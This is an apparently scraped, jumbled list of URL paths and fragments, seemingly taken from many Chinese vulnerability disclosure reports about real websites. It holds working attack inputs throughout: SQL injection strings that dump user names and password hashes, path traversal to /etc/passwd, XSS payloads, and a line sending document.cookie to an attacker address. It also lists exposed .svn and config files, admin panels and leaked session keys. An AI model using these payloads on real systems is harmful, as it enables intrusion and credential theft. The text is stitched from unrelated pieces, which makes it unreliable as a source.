/links/admin/fly.jsp /htmledit/admin_login.asp /htmledit/db/ewebeditor.mdb /hd/bjsqx/config/ /NetApplyWeb/personacctoutResult.jsp?bacode=61xx00xxx /154193789 /t_images/face_temp/20111109/pnge6211f49803f9efd2c8f937f6587a609.j"+src=#+onerror="alert(1) /upload.php?type=face&r=0.5138148728288972&p=http%3a%2f%2fs3.ppsimg.com%2ft_images%2fface_temp%2f20111109%2fpnge6211f49803f9efd2c8f937f6587a609.j%22+src=%23+onerror%3d%22alert(1)&x=0&y=0&w=32&h=31&o_page=setting_myface /opinion/showOpioion.action?complaintId=216145 /opinion/showOpioion.action?complaintId=2161458 /main/reader/huodong.do?method=initHuodong / /tag_single_bk.php?wiki=202801096#entry_0 /shopping.rar /cn2/manage/mobile/set_mobile_fill?flow_type=update 0px;padding:0px 12px 12px go=Request.QueryString("go") FileExt=file.FileExt /ids/control/htmleditor/upload.jsp / admin /website/ /webmall/ /webmall/detail.php?id=fuck /admin.php api.domainshare.tk/resend_email.json?email=webmaster%40bigwww.com&password=feishukeji***&domainname=muingrong.tk&enduseremail=admin%40qq.com /account/resendverifyemail?userId=12 /account/resendverifyemail?userId=13 /index.php?mod=home&adtag=top_home /index.php /USERID dl.xunlei.com/xmp.html /exploits/16680 /exploits/15881 /exploits/15852 /test.php /shownews.asp?id=387965727777778 /news/newscontent-10358-1.htm /而实际上跳转到了http://game.tuduo.com/,而该域名处于未使用状态,如果被恶意使用,将导致土豆网用户“被官网”钓鱼。 /invc/qqplayer/QQPlayer_Setup_32_845.exe /index.php /bugs/wooyun-2010-03358/trace/1dc8c788de0cb67559a876fdc06bf01e /1.js /admin/login.php /admin/login.aspx axadmin.php axphp.php /www.noahacker.com /do/schools.php?f_id=8&a_id=2883 /?clientuin=用户id&clientkey=284E9CE909F4177F7F532275DC931B7ED82B712F0594F49AAD421098BDB0E88A&ADUIN=用户id&ADSESSION=1322041983&ADTAG=CLIENT.QQ.3847_MyTip.0 /client_jump?clickid=6&clientuin=用户id&touin=用户id&clientkey=284E9CE909F4177F7F532275DC931B7ED82B712F0594F49AAD421098BDB0E88A&ADUIN=用户id&ADSESSION=1322034546&ADTAG=CLIENT.QQ.3847_MyTip.0 /adclick?sid=2&cid=25&aid=759&bid=0&unit=3326&advid=3133&guv=&url=http://www.weibo.com/hackxiaoxin /k/IZm,相信群里大部分的人都认识她。利用短网址逃避腾讯恶意网站检测并伪装成QZONE空间诱骗用户输入QQ密码。 / /adclick?sid=2&cid=169&aid=859&bid=0&unit=4918&advid=4684&guv=&url=http://weibo.com/u/2345253177 /adclick?sid=2&cid=169&aid=858&bid=0&unit=4882&advid=4648&guv=&url=http://weibo.com/u/2345253177 /active/girl/user_photo.php?id=169&sid=897 /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /blog7style/images/common/loading.gif /signup/signupmail.php?entry=blog&r=&srcuid=&src=blogicp /blog_rebuild/blog/xmlrpc.php /blog_rebuild/blog/xmlrpc.php?rsd /blog_rebuild/blog/wlwmanifest.xml /rss/2439749250.xml /blog7style/css/conf/blog/index.css /blog7newtpl/css/30/30_1/t.css 120px;top:113.95px 120px;top:200.067px z-index:512 /blog7style/images/common/topbar/topbar_logo.gif left /admin/article/article_add.php /blog7style/images/common/sg_trans.gif absolute;left:0;top:0 /u/2439749250 /u/2439749250 /u/2439749250 void(scope.pa_add.add('2439749250')) /u/2439749250 /s/articlelist_2439749250_0_1.html /u/2439749250 /s/profile_2439749250.html #34 /blog7style/images/common/sg_trans.gif /2439749250/blog/180 none /blog7style/images/common/sg_trans.gif /discovery.html /blog7style/images/common/sg_trans.gif /2439749250?source=blog /blog7style/images/common/sg_trans.gif void(0) void(0) /s/profile_2439749250.html#write /blog7style/images/common/sg_trans.gif /blog7style/images/common/number/1.gif /blog7style/images/common/sg_trans.gif /blog7style/images/common/number/2.gif /blog7style/images/common/loading.gif /blog7style/images/common/loading.gif /blog7style/images/common/loading.gif /blog7style/images/common/loading.gif /s/articlelist_2439749250_0_1.html /s/blog_916b9e820100yay9.html /blog7style/images/common/sg_trans.gif /c.php?t=blog&k=%D4%D3%CC%B8&ts=bpost&stype=tag /showpic.html#blogid=832be4280100sbp5&url=http://s3.sinaimg.cn/orignal/832be428ga714e0ea5852 /blog7style/images/common/sg_trans.gif /middle/832be428ga714e0ea5852& /showpic.html#blogid=832be4280100sbp5&url=http://s14.sinaimg.cn/orignal/832be428ga714e33d425d /blog7style/images/common/sg_trans.gif /middle/832be428ga714e33d425d& /showpic.html#blogid=832be4280100sbp5&url=http://s14.sinaimg.cn/orignal/832be428ga714e63e08bd /blog7style/images/common/sg_trans.gif /middle/832be428ga714e63e08bd& /showpic.html#blogid=832be4280100sbp5&url=http://s6.sinaimg.cn/orignal/832be428ga714e3f496f5 /blog7style/images/common/sg_trans.gif /middle/832be428ga714e3f496f5& /?qqfriend10 /?qqfriend10 /s/blog_916b9e820100yay9.html /s/blog_916b9e820100yay9.html#comment 0px;height:0.1px;margin:0px absolute;left:0px;top:0px;width:0px relative /admin/advice/advice_list.php /admin/advice/impeach.php?url=http%3A//blog.sina.com.cn/s/blog_4cf7b4ec0100eudp.html%3Ftj%3D1 /chn/ /eng/ / /contactus.html /chn/sina_job.html /intro/lawfirm.shtml /apply/ / /intro/copyright.shtml /index.jsp /blog7common/js/boot.js absolute;top:0;left:0;width:0;height hidden /a.gif?noScript /a1.js / /a.gif?a=&c=860010-0328010000 secure-cn.imrworldwide.com/v52.js secure-cn.imrworldwide.com/cgi-bin/m?ci=cn-sina2006&cg=0 #34 /stevrce /goto.jsp?url=//www.wooyun.org/ /Pages/MemberCenter/Login.aspx /info.php / / /等多个分站评论处存在物理路径泄露,深挖的话,有可能会有xml那个解析漏洞,没深挖。 /miniphp/admin.php /zt/s?k=11603&hasori=1&filter_adv_search= /thread-2354532-1-1.html /%E6%96%B9%E8%B6%85x%3Cscript%3Ealert%28/ss/%29%3C/script%3E/5 /info.php?i=1&u=%CB%D5%B9%DA%BB%AA%27&e=354111841%40qq.com%27%3Cscript%3Ealert%28/s/%29;%3C/script%3E /wp-content/themes/xiaomi/ /index.php?action=rank&date=2011-11-13%27 /register/index.php?a=phone_reg /wsyw/tbpassportapply/tbpassportapply.do?method=grly /j?url=http://toran.cn/1au7l /miniphp/cache/template/2.php /main.php?uid=2805&type=pic&status=1 /main.php?uid=2805&type=pic&status=1&act=sharex sj.xiaomi.com/miniphp/cache/template/8bb2e0a169ed573c81291c5b912aa2f1.php sj.xiaomi.com/miniphp/cache/template/8bb2e0a169ed573c81291c5b912aa2f1.php sj.xiaomi.com/miniphp/config.inc.php /main.php?uid=2805&type=pic&status=1 sj.xiaomi.com/miniphp/cache/template/2.php /miniphp/cache/template/2.php /main.php?uid=2805&type=pic&status=1 sj.xiaomi.com/miniphp/cache/template/3.php /miniphp/cache/template/3.php /invitereg.php?s=UPRYhoSTCA895an54MieFFb%2F2ENCzYD7ZL8M4sEvpz8IJyysbpe3Hw%3D%3D钓鱼地址, /showtopic-135589.html /admin/ajax.aspx?AjaxTemplate=ajaxtopicinfo.ascx&poster=1 /about/news.asp / /163today/163today_tuijian.php?omID=21%20and%201=2%20union%20select%201,group_concat /account/profile/basic.json /bugs/wooyun-2010-03521/trace/0e8e79124cc144c315df6ac4b7432436的 window.location.href='http://我们的flash地址啦/qq.swf?cookie='+document.cookie /smellyxiaozi /admin/monitor_postlog_check.php /315/admin/login.php /activity/SQQ5Years_inviteFriends.shtml?_friends=[%225447055%22]&type=&0.45947107020765543 /item_htm.asp?id=2215&2515238 /item_htm.asp?id=165&5526535 /item_htm.asp?id=165&5526535 /item_htm.asp?id=2215&2515238 /agent-admin/login.aspx /freeform/admin/ /index cmt.ifeng.com/admin/login.jsp /picture?p=../.htaccess /picture?p=../../../../cmis/web/dev_meeting/mail.php expressio/*\0*/n expressio/*\0*/n 2011.12.03 2011.12.03 alert(Shelldoe') /index.php?mod=home /index.php?mod=home&adtag=top_home /USERID/infocenter /100000abc123 /gate/big5/ /admin/show/login /filestores/2011/11/27/9fd4b463a22085ee4a3f011a592ed4a7.jpg/1.php /filestores/2011/11/27/9fd4b463a22085ee4a3f011a592ed4a7.jpg%00.php / /widget.php?key=../../../../../../../../../../../usr/local/apache2/conf/httpd.conf%00 /User/MailIndex.aspx只做客户端验证,绕过后可以构造特殊脚本。登陆后脚本如实被打印在页面上执行。但很鸡肋,没法利用。第2个就不一样了; /bbs/attachments/month_1112/11120820515cde193ce2d3a9fe.jpg /bbs/attachments/month_1112/11120820515cde193ce2d3a9fe.jpg /go/getflashplayer /admin2006/ /answer_my.php?tid=63696 /comment/comment.php?action=vote&field= / /wfms/login.jsp /bugs/wooyun-2011-01904的修复是修改了tudou的swf的allowscriptaccess,但是对于其他视频网站的,竟然...啥也没变...还是always /bugs/wooyun-2010-03574 /examples/ /examples/ /data3/exe/cfebd7b436946760143f98bc9cc78fde/XLaccSetup_xlmt-1.1.14.1434.exe /extracare/main_1.asp /jbhc/yuer.asp /admin/login.php?_action=chk /news/s7/panda.php?name=2 /bbs/manage/ /file/id_774356833665645.html下载键盘记录器及lpk.dll文件(只支持Windows /index.php?goto=RETURN_URL /site/callback?referer=http%3A%2F%2Fwww.xiaomi.com%2F&token= /index.php?token= /image.cgi/idea?w=%3Cscript%3Ealert%281%29%3C/script%3E&ic=one&ac=&ity=12&shape=&iclr=&id=3&ch=s.p.cy.res.detail&pid=p.cy.in.i /virtualdevil/blog/item/564b9cce551a4e20f9dc6117.html /bbs/manage/login.php /bbs/manage/modSaybar.php?id=66 /看了下源代码, 488A4255-3236-44B3-8F27-FA1AECAA8844 /aliedit/aliedit/2401/aliedit.cab#Version=1,1,0,0 /xShare?do=list2&choice=sms&category=x%27%20and%201=2%20union%20select%201,2,3,host,user,password,7,8,9,0,1,2,3%20from%20mysql.user%23&orderby=m_hot /rso/1.php /xiaomi.com /xShare?do=list2&choice=sms&category=x%27%20and%201=2%20union%20select%201,2,3,4,concat%28uid,0x7c,username,0x7c,password,0x7c,salt,0x7c,email%29,6,7,8,9,0,1,2,3%20from%20ucenter.uc_members%20where%20email%20like%27%25snowhilloldman%25%27%20limit%200,1%23&orderby=m_hot /z/q***.htm(***为数字di)的问问页面,此页面有X个答案,每个回答有一个用户名,此用户名可能为真实回答此问题的用户的微博地址,也可能为一个随机生成的系统用户(在此鄙视腾讯的随意和不负责任的数据采集和生成SEO页面的行为),通过替换id到http://wenwen.soso.com/z/QzoneQuestion.e?sp=***的页面,可以得到Y个答案,每个回答有一个用户名,用户名为QQ号..其中X集合不等于Y集合,XY数量不定,为A的子集鸡肋利用:查找id为xxx的用户的qq号码,可搜索此人广播,如有回答#万能的微博#的微博,且被问问转发形成类似http://wenwen.soso.com/z/q***.htm的页面(会有问问转发的一条微博),则可到对应的http://wenwen.soso.com/z/QzoneQuestion.e?sp=***页面中查看,此用户QQ号可能出现在此页面中,根据回答内容可以确定qq号与微博的对应关系,查找出QQ号码,demo /newproduct/love/common.php /webroot/WEB-INF/classes/com/sohu/wap/mydbConn/ /trial/login.aspx /bk.js /_d8.htm?k=s /.svn/entries /sqlite /job.do?method=selJob&catid=6&keywords=http://p0.55tuan.com/themes/default/images/static/img/shanghai.gif&catname=WooYun%20%20piaoye /index.php / admin.被封了以后 /test.php/1.png /QA/uploads/mssql2009.php /plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D xx.com/xx.txt),右键选择迅雷下载,迅雷会将google的cookie传给xx.com。 /user_22710%22%20onerror=%22alert%28document.cookie%29%22 /index/index/cityid/ /backUrlUTF8.do?url=http%3a%2f%2fwww.lashou.com%2f /backUrlUTF8.do?url=http://www.lashou.com/ /login.php?url=http://www.55tuan.com/userLoginSubmit.do /portal-topic-topicid-23.html,点击在线客服,顺手在在线客服地址加个admin路径 /web/admin/,呃,存在。 /2011/0818/aux/self.php?pid=10 /self.php?hid=1 /adminer.php /script/buyer/product_list?list_type=2&product_keywords=%D0%C2%C6%B7%CB%AE%BE%A7%B9%D2%BC%FE%20product_keywords=%D0%C2%C6%B7%CB%AE%BE%A7%B9%D2%BC%FE%20"xxs /phpinfo.php /phpinfo.php /111 /ui2K /cgi-bin/cgi_imgproxy?url=http%3A%2F%2F211.20.209.23%3A8888%2Frpm%2Fimg5000.php&size=0 /test.jsp /data.mdb /user/register_email_ok.php?uid=***&email=**@123.com&code=9c7aef28a6e7742cb1157a4d2f0b7375 /user/register_email_ok.php?uid=***&email=***@123.com&code=5addd7dec4e1a4df6c0efc6441e5c41c /d/VNTEYDWQCXST / /manager/js/jquery-1.4.2.min.js,尝试http://hot.baidu.com/manager/也居然提示登陆,扩展名是php,并且默认用户名是admin,通过经验不难看出,这是dedecms的后台。 /Members/ShopComInfo.aspx?Cid=3 /gsps/ /resetPwd.aspx?usernumber=13888888888&sptype=1 /vuldb/ssvid-20898 /TR/xhtml1/DTD/xhtml1-transitional.dtd /1999/xhtml /notice/managerlist.html /bbs/.svn/text-base/config.inc.php.svn-base /bbs/uc_server/data/.svn/text-base/config.inc.php.svn-base /uc_server/api/dbbak.php?加上生成的code串 /Search?book=y&keyword=%27;!--%22;eval%28%27alert%28%5C%27just+a+test%5C%27%29%27%29%3B%22%3CX%3Calert%281234%29%3ES /shtml/mobile_02.shtml?par=99.00&mobileType=mobile&mobileNo=%3Cscript%3Ealert%281%29;%3C/script%3E&czlx=I&parValue=100&productCode=SHKC /member/trademanage/rechargeAndwithdrawRecords/toQuery?startDate=2011as-12-17+00%3A00%3A00&endDate=2011-12-17+00%3A00%3A00 /main.php?s=admin&a=login /taoohostwar/admin/admin.php?select=verify&mod=login&act=default&timeout=1322115299&uniqid=4ecca48195c87&time=1322034305&token=5464a699206315a9c372b961dc09ce31 /admin/login.html /200704changcheng/admin/login.php /blogflag/admin/login.html /auto/4s-admin/login.php /prog/wapsite/stat/cooperate/login.html /article.php?acid=-1'+union+select+GROUP_CONCAT(DISTINCT+username,0x5f,password,0x5f,status,0x5f,num),@@basedir+from+sds_user/* /ecp.website/bingoCode/login.jsp /bbs/second.html?g=/../../../../../../../../../../../../etc/passwd%00.html /gis/GisHandler.ashx?lastIndex=101&provider=orderGisTrackFaHuo&orderId=(流水订单号) /flash/.svn/entries /more.php?id=-8%20union%20select%201,user(),3,4,5,6,7,8,9,10-- abc.3322.org/XXX /admin/ /index.php/crowdtest/post/showPost/postId/5771/proId/0 /iSpaceWeb/webdisk.action /fuck.txt /的URL都能通过。 /install.log /SITES.INI /nerp/login.jsp /nerp/oa/login.jsp /nerp/oa/main.jsp /1998/Math/MathML /~root pay.qq.com/qqshow/index.shtml?ch=self&service_type=qqshow&CacheTime=1325035348 /u/USERID?key_word=%22%3E%3Ciframe%20onload=alert%28document.domain%29%3E&is_search=1 /customerLogin.html?fromu=http%3A%2F%2Funion.baidu.com%2Fuserlogin.action&e=%3CIFRAME%20width=500%20height=1000%20src=%22http://www.wooyun.org%22frameborder=0%20%3E%3C/IFRAME%3E&un=xxx&aid=6&errno=132 /wap/login.php /newver/login.action?toWapTwo=1 /?key=f',true,1 /prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11-- /manage/login.php /vote.php?act=dovote&name[a%27][111]=aa Array alert(/x/)】,post提交后,所有头像引用代码辩位 alert(/x/) /index.php?m=attachment&c=attachments&a=swfupload_json /index.php?m=attachment&c=attachments&a=album_load&t=1&dosubmit=true&info[where]=%201=1%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20concat%28username,0x7c,password%29%20from%20v9_member%20%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /index.php?m=attachment&c=attachments&a=album_dir&dir=.../../.../...///phpsso_server/ /user/message/send /popsite/meilin/shownewsen.asp?id=140 /plaf/login.jsf /cgi-bin/loginpage?f=xhtml /file/4336122 /new/hello.aspx?para=%27%22%28%29%26%251%3cScRiPt%20%3ealert(/xss/)%3c%2fScRiPt%3e /new/hello.aspx?para=%27%22%28%29%26%251%3cScRiPt%20%3ealert(/xss/)%3c%2fScRiPt%3e /3dyySg /30795848.mp3 /3dyySg?1.mp3 / /wap/post/reply /install/InstallWebService.asmx /install/InstallWebService.asmx /install/InstallWebService.asmx /user/blog没验证token和referrer /wxcs/st/Teacherday/vote.aspx?type=3 / /huangou.php?id=-1%20union%20select%201,2,3,group_concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29 /config/ /robots.txt www.swust.edu.cn、news.swust.edu.cn、blog.xxox.org等网站的管理员认证。从而查看360网站扫描的扫描结果。 /sdcard/ /mailregAll/reg0.jsp?from=11111111111%3C/script%3E1111111%3Ciframe%20src=http://www.baidu.com%3E11111111111 /file/4378846 /dl.aspx?file=/web.config //manage/admin.aspx /sites_details.asp?areaid=17 /news_details.asp?id=957 /Job/Person.aspx?id=77777 /admin/websiteAdd.jsp /admin/linkPromotion.jsp /admin/myLinkList.jsp /admin/list.jsp /admin/login.jsp /admin/myStats.jsp /project/projectlist.jsp /sysadmin/module/modulelist.jsp /hotinnav.jsp /urank_16_1_274076963.html /application/classes/controller/publish/release.php / /index.php/auth/login //www.weibo.cn),或者通过iphone客户端、Android客户端或ipad等访问,都有可能被session /406tgk /profile/index,编辑个人资料,个人签名输入跨站脚本,点击保存后,跨站脚本立即执行。 /tomos/ui/getpassword.htm /2008/0702/qipai/personal.php?id=32 /UserCenter/Index/?userName= /blog/ /livestream/listlive.php?language=zh_cn&width=242&height=290&uid=1459831275&skin=1&refer=1&pic=1&titlebar=0&border=0&publish=1&atalk=1&recomm=1&at=1&atopic=111&ptopic=1111&dpc=1 /index.php/crowdtest/bug/update/pro_id/416/bug_id/14240 /index.php/crowdtest/bug/update/pro_id/416/bug_id/14240 /auction/publish/edit.htm?item_num_id=14769508366&auto=false /item.htm?id=13867803337的编辑界面,就访问http://upload.taobao.com/auction/publish/edit.htm?item_num_id=13867803337&auto=false /login /data/files/20120202/1328167115.17.txt/x.php /Register.aspx /script/redirect.php?class=china&action=http://lcxv.net /script/redirect.php?class=china&action=http://lcxv.net /admin/index.html /othercity/all.htm?clientkey=0AC8B541A8781EA81CAD4E87DA4ECFCA134DAB81517DACA29823F84705D874A6&Uin=6******0&pref=3007 /qqmail?Fun=clientread&ptlang=2052&httptype=0&uin=QQ号&k=嗅探到的clientkey /view/7a3900ea551810a6f5248632.html, /view/7a3900ea551810a6f5248632.html, /admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1 username=admin /searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251 abram.intra.vcotton.com/www/current/app/app_controller.php /app/v1.0/qryfriends.cgi?OutPutType=JSON,用户过单点登录情况下泄露该qq账号的好友信息 /queryBill.jsp ?return_url=http://www.qq.com ?return_url=http://www.taobao.com ?return_url=http://www.icbc.com.cn ?return_url=http://www.alipay.com /space/Other/Posts.aspx?userid=5469987%27 www.it168.chinacache.net www.it168.chinacache.net www.bbs.it168.com www.itpub.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.free.it168.com www.free.it168.com www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.hr.it168.com www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.staff.it168.com www.staff.it168.com www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.udc.it168.com www.udc.it168.com 119.254.79.192/26 119.254.79.32/29 www.vip.it168.com www.vip.it168.com www.it168.chinacache.net www.it168.com www.it168.chinacache.net www.it168.com www1.it168.com www17.it168.com www18.it168.com www2.it168.com www3.it168.com www4.it168.com www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net www.it168.chinacache.net com.anguanjia.safe/shard_prefs文件夹 /先随便登录下,产生SESSION后再点击“注册”,在注册页面中就会返回找不到储存SESSION的文件的路径和程序的路径。 wap.soufun.com/bbs/register.php wap.soufun.com/bbs/register.php:2 wap.soufun.com/bbs/register.php /下的多个页面被插入恶意内容,并存在SQL注入 /market/eles/news_view.asp?newsid=92 /inc/ /market/zhongjie/admin/ /market/zhongjie/admin/news.asp /market/zhongjie/admin/com.asp /market/zhongjie/showcom.asp?id=23 /viewnotify.php?id=4758%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,name,password,11,concat(0x61696D65657875,load_file(0x2f6574632f706173737764),0x61696D65657875),13,14,15,16,17,18,19%20from%20pku_admin%20limit%200,1-- /uc.php /friends/index_blessing.php?id=7717 /bbs/showtree.aspx?topicid=4485&postid=40214 /2008/killtshirt/default.aspx?Page=6 /bridgeImpplayclub.asp?playno=14&flag=-1&cardno=1389626 /bbs/showtree.aspx?topicid=4485&postid=40214#不用显示错误吧 /dpool/eladies/commentslist.php?vt=4&product_id=10171%20and%201=1 /dpool/eladies/commentslist.php?vt=4&product_id=10171%20and%201=2 /more.php?id=1 /admin/manager.php /region1.php?id=2&pid=2 /zhuanti/njxn/njxnvote.asp /2007spring/guangzhou/show2.asp /zhuanti/yht/view.asp?p_id=13&class_id=21&id=262 /sechouse2/products.asp /xinxi/shownews.asp?id=(575)And(1)=(2)UNION%0DSELECT%0D1,chr(116)%2bchr(101)%2bchr(115)%2bchr(116),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%0Dfrom%0DMSysAccessObjects /plus/feedback_ajax.php?dopost=getlist&aid=22668&page=a /plus/hotels_feedback_ajax.php?dopost=getlist&hid=557&page= /list.php?cls=104 /detail.php?id=error guide.cn.real.com/newsite/youku/list.php guide.cn.real.com/newsite/youku/list.php guide.cn.real.com/newsite/youku/detail.php /api_ptvideoinfo?pid=XMTI3Ng==&id=error guide.cn.real.com/newsite/youku/detail.php /player.php?pv=&tag=whhgx&vid=XMTgwMzc5Njg4&title=%E4%BA%8E%E9%9B%AA%E8%96%87 /audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy /audi-ade/play.php?type=tt&vid=XMjgwMDk1MjEy%3C/script%3E%3Cscript%20src=http://127.0.0.1/webpage.js%20type=text/javascript%3Ediaoyu();/* /i?ct=6&bt=1&tn=baidudetaillost&isign=2939662430,1160510623&tsign=612809584,2382851181 /friends/index_blessing.php?id=26083 /usr/eXtplorer/index.php?extplorer /adm/index.php admin admin23 /chexian/admin/phpMyAdmin-2.11.5.1-all-languages/ /admin/ /admin/login.html /cgi-bin/med/trans_manage.cgi?PcacheTime=624444 /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /?mod=activity&act=activitydetail&activity_id=70%20and%201=2%20union%20select%200,unhex /etc/passwd /etc/passwd /etc/passwd /etc/passwd /etc/issue /bin/su /etc/passwd /etc/passwd /etc/hosts /etc/passwd /mobile/travelnotes/gettravels.php /jump?uin=123456&skey=@7bmBHm0XLp&u1=http://app100617408.qzone.qzoneapp.com/games/link/movie.html /jump?uin=123456&skey=@7bmBHm0XLp&u1= /games/link/movie.html /chxw2.php?articleID=98%27%20%20%20And%201=2%20UNION%20all%20SELECT%201,2,3,4,5,6,7%20--+a /index.html)下载的越狱版deb安装包,可能由于内部员工疏忽或打包程序BUG,导致内部的.SVN信息被封装进了安装包,解包后可以看到源代码SVN地址、作者、版本号等信息。 /admin.php /team/?addr=%E6%8A%A0%E6%8A%A0%E7%BD%91从在sql注射 /admin /phpMyAdmin/phpMyAdmin/ /news/admin/ /lomo/admin/ /game_compare/admin/single_game_info.php?game_id=55 /sgcq/sgcqangle/sgcqfindangle!list.action?job=5 /wulin2/wl6doorpic/wl6DoorPl!list.action?imgid=2292 /comment/include/connect.inc.php it168 password:123456 /update/ /test/ /update/protected/controllers/UpdateController.php //protected/controllers/UpdateController.php /public/db_backup/HSH.mdb /detail1.php?zid=8371 /mod_user/mod/exterior/ /ws/jsonData.aspx?strwhere=a%27%20and%201=1-- /ws/jsonData.aspx?strwhere=a%27%20and%201=2-- /jump?uin=123456&skey=@7bmBHm0XLp&u1=网址 /uchome/link.php?url=网址 /e/public/jump/?classid=288&id=87098&url=网址 /Nk7DU&subtemplate=gray&evil=0 /no/ /jump?uin=123456&skey=@7bmBHm0XLp&u1=http://uchome.developer.manyou.com/uchome/link.php?url=http://golf.cctv.com/e/public/jump/?classid=288&id=87098&url=http://t.itc.cn/Nk7DU&subtemplate=gray&evil=0 /bbs/viewthread.jsp?tid=46666&page=1&authorid=1 /archives/171 /getcookie.php\ /getcookie.php /soccer/i.php?a=1122&id_bang_zhu=39 /login.jsp?appuri=RETURN_URL&useruri=RETURN_URL&service=uc /login?passive=true&useruri=USERURI&token=TOKEN /iframe_cookie.php?res_id=2989’ /dnis/index.jsp /Manger/ /inc/upload.asp /2005/tlnewslink.asp?id=802 www.21441.com), /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1%27%29;declare%20@t%20nvarchar%2840%29%20select%20@t=%28select%20top%201%20name%20from%20sysobjects%20where%20name%20like%27%_users%27%20and%20xtype=%27U%27%29%20exec%28%27update%20%27%2b@t%2b%27%20set%20groupid=1%20where%20username=%27%27xxxxx%27%27%27%29-- /search?q=site%3Asohu.com+inurl%3Adb+mysql&hl=zh-CN&newwindow=1&safe=strict&gbv=2&prmd=ivns&ei=g0E5T6z4FuWuiQeum7SJAg&sa=N&oq=site%3Asohu.com+inurl%3Adb+mysql&aq=f&aqi=& QQ:2036234 /p/ /p/ /jump?uin=123456&skey=@7bmBHm0XLp&u1=http%3A%2F%2Fuchome.developer.manyou.com%2Fuchome%2Flink.php%3Furl%3Dhttp://golf.cctv.com/e/public/jump/?classid=288&id=87098&url=http://url.ifeng.com/XZXi&subtemplate=gray&evil=0 /Login.aspx /admin/login.htm /job_content.php?id=15 /plug/search_cont.php?id=19 /countfriendlink.php?id=58&link= /plug/search.php?key=%3Ciframe%20width=800px%20height=600px%20src=http://gesong.org%20%3E%3C/iframe%3E /wap/?a=info&id=75&m=Soft&t=x /wap/?a=down&id=254&m=Soft&softid=75&t=x /wap/?m=Soft&stid=5&t=x /uc_server/control/admin/db.php /static/image/common/logo.png/.php Insight-D / /stockradar/config.html /mobile/cellphone?ky=iphone /index.php?action=member-register&act=getSchool&province_id=101%20and%201=2%20union%20select%201,2,TABLE_NAME,4%20from%20INFORMATION_SCHEMA.TABLES-- /extra.php?mod=themevote/stat&tpp=1/*!select*/&page=2 /archives/171 /sid=aWinrA5xZQpbv6nKSv/wapmail/signOn.do /id.php此页面目测位输入账号显示用户昵称与在数据库表中的位置。 /act.php此页面爆路径 /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 /space/manage/ajax.aspx?AjaxTemplate=../../admin/usercontrols/ajaxtopicinfo.ascx&poster=1 /svn/trunk/my-unionpay/ /admin /search.php?search=8888%22%3E%3Cscript%3Ealert(/wooyun.org/)%3C/script%3E'%3C /show.php?id=12593 / /1 /admin/login.php www.cueb.edu.cn www.bit.edu.cn www.ccps.gov.cn www.bucea.edu.cn www.xidian.edu.cn www.bnu.edu.cn www.bjta.gov.cn www.sara.gov.cn /changetomanager.do / /ajax/.svn/text-base/action_msg.php.svn-base/1.php //market/index.php?mod=index%3cscript%3ealert(45238)%3c%2fscript%3e&act=app /index.php?act=logout&mod=index&r=%2f%2fwww.baidu.com /zt/20110816/.svn/text-base/setting.php.svn-base /ajax/.svn/text-base/action_msg.php.svn-base //market/index.php?mod=index%3 /rootsule/blog/item/fe6ebc042726730f738b6538.html /、 /admin/Login.aspx /QZadmin/Login.aspx /admin.jsp /admin/login/?msg=ERR.SESSION.TIMEOUT /admin/login.php /admin/adminMain.do /lt/plugin/portal/vild.do是联通用来给客户发联通营业厅信息的,任何人都可以自定义信息发给联通号码,接收的人看到是10010发的,相信程度很高,所以很危险啊 /renwu/admin/login.html /lib/car/bg_all/login.php /index /gate/big5/cosmetics.ifeng.com/admin/logon /freeform/admin/user/login.jsp /admin/login.jsp /docrank/admin/ /admin/login.php /mall/web/guest/admin-login /jsp/xxfb/dt/dyjf2010/login.jsp /power100/login.jsp /mobileshop/g3/admin/login.jsp /adc_area/login.jsp /sp/portal/login.jsp /ptt/admin/login.aspx /admin/login.php /webroot/ /baidu/wp-login.php /wfms/login.jsp /promotion/login.jsp /315/admin/login.php /login/admin.htm /survey/admin/admin.php / /t.php%20style="height:530px /xinwen/chakanpinlun.php 